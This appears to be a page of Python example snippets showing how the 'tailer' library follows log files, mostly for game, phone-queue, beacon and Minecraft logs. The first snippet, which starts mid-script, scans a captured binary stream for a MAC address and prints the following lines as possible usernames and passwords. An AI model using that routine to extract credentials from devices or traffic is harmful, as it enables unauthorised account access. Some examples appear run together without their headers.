proc2 = subprocess.Popen("tail -f tmpstream.txt | strings >>tmpstrings.out", shell=True, preexec_fn=os.setsid)
print bcolors.BOLD+"hit CTRL+C to exit.."+bcolors.ENDC


while 1:
	sys.stdout.flush()
	if os.stat('tmpstrings.out').st_size <= 1024:
		sys.stdout.write("binary data: "+str(os.stat('tmpstream.txt').st_size)+"\r")
	else:
		sys.stdout.flush()
		print "strings in binary data found.. password should be around line 10000"
		for line in tailer.follow(open('tmpstrings.out','r')):
			sys.stdout.flush()
			if done == 0:
				linecount+= 1
				if line == macaddr:
					sys.stdout.flush()
					done = 1
					print bcolors.OKGREEN+"\n\nmac address triggered.. printing the following dumps, could leak username and passwords.."+bcolors.ENDC
				else:
					sys.stdout.write(str(linecount)+"\r")
			elif done == 1:
				done = 2
				print "\nfirstline.. "+bcolors.OKGREEN+line+bcolors.ENDC
			elif done == 2:
				done = 3
				print "possible username: "+bcolors.OKGREEN+line+bcolors.ENDC
Example #50
        if amt > 250:
            red_flags.append(dm)

    else:
        pc_idx = next(idx for (idx, d) in enumerate(day_rec[dm]) if d['pc'] == pc)
        day_rec[dm][pc_idx]['amt'] += amt
        day_rec[dm][pc_idx]['details'].append((timestamp, amt))

        if day_rec[dm][pc_idx]['amt'] > 250 and dm not in red_flags:
            red_flags.append(dm)


setup_dirs()

for line in tailer.follow(open('samplelog.txt')):

    #TODO: Better line validation. We don't want to try to parse
    # any non-XP entries (for now.)
    # Ignore an empty line rather than continuing
    if len(line) < 1:
        continue

    tokens = line.split('|')

    # Ignore if this isn't one of our special lines
    if len(tokens[0].split(']')) < 2:
        continue

    timestamp, dm_event, dm, pc, player, amt = parse_xp(tokens)
    _ = timestamp.split(' ')
Example #51
# -*- coding: utf-8 -*-
import tailer
from os import listdir
from os.path import isfile, join, sep, expanduser

path = expanduser("~")+sep+"logutil"+sep+"testFolder"
files = [ f for f in listdir(path) if isfile(join(path,f)) ]
sorted_files = sorted(files)
last_log_file = sorted_files.pop()
file_with_path=path+sep+last_log_file

for original in tailer.tail(open(file_with_path),50):
    print original

for line in tailer.follow(open(file_with_path)):
    print line
    print "Another instance is already running, quitting."
    time.sleep(1)
    sys.exit(-1)

class QueueLog(SQLObject):
    time = StringCol()
    callid = StringCol()
    queuename = StringCol()
    agent = StringCol()
    event = StringCol()
    data = StringCol()

connection = connectionForURI(dsn)
sqlhub.processConnection = connection

for line in tailer.follow(log_file):
    t = line.split(SEPARATOR)

    print t
    
    QueueLog(
	time = t[0], 
	callid = t[1],
	queuename = t[2],
	agent = t[3],
	event = t[4],
	data = SEPARATOR.join(t[5:])
    )


    
Example #53
route='/submit'

#base_url_def="http://ec2-54-184-199-186.us-west-2.compute.amazonaws.com"
base_url_def="http://localhost:7979"

if len(sys.argv) > 1:
    file_to_follow=sys.argv[1]
else :
    file_to_follow="/var/log/iBeacons.log"

if len(sys.argv) > 2:
    base_url=sys.argv[2]
else :
    base_url=base_url_def

url=base_url+route
print "collecting data from %s and sending to url %s" %(file_to_follow, url)

def publish_5(line):
    data=line.split(',')
    if len(data) != nitems:
        print "Warning did not find %s comma separated items. Skipping line." % nitems
    else :
        uuid,major,minor, rssi, date_str = data
        publish_it(url=url,uuid=uuid,major=major,minor=minor,rssi=rssi,date_str=date_str)

my_call_back=publish_5

for line in tailer.follow(open(file_to_follow)):
    my_call_back(line)
Example #54
def getOrder():
	return tailer.follow(OrderFile,0)
Example #55
import tailer
import time
import serial

ser = serial.Serial('/dev/tty.usbmodem1461', 9600, timeout=None)

for line in tailer.follow(open('/Users/Mike/Library/Application Support/minecraft/logs/latest.log')):
    if "Arduino LED Triggered" in line:
        print "Sending message to Arduino"
        ser.write('5')
    if "Something else" in line:
        ser.write('4')
Example #56
 def ingest(self):
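     # parse each new line and hand the three parsed fields to the producer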
     for line in tailer.follow(open(self.path)):
         resSet=self.parseLine(line)
         self.producer.keyedProduce(resSet[0],resSet[1],resSet[2])
Example #57
def getMatch():
	return tailer.follow(MatchFile,0)
Example #58
# -*- coding: utf-8 -*-
import tailer
from sys import argv

script, filename = argv

for original in tailer.tail(open(filename),50):
    print original

for line in tailer.follow(open(filename)):
    print line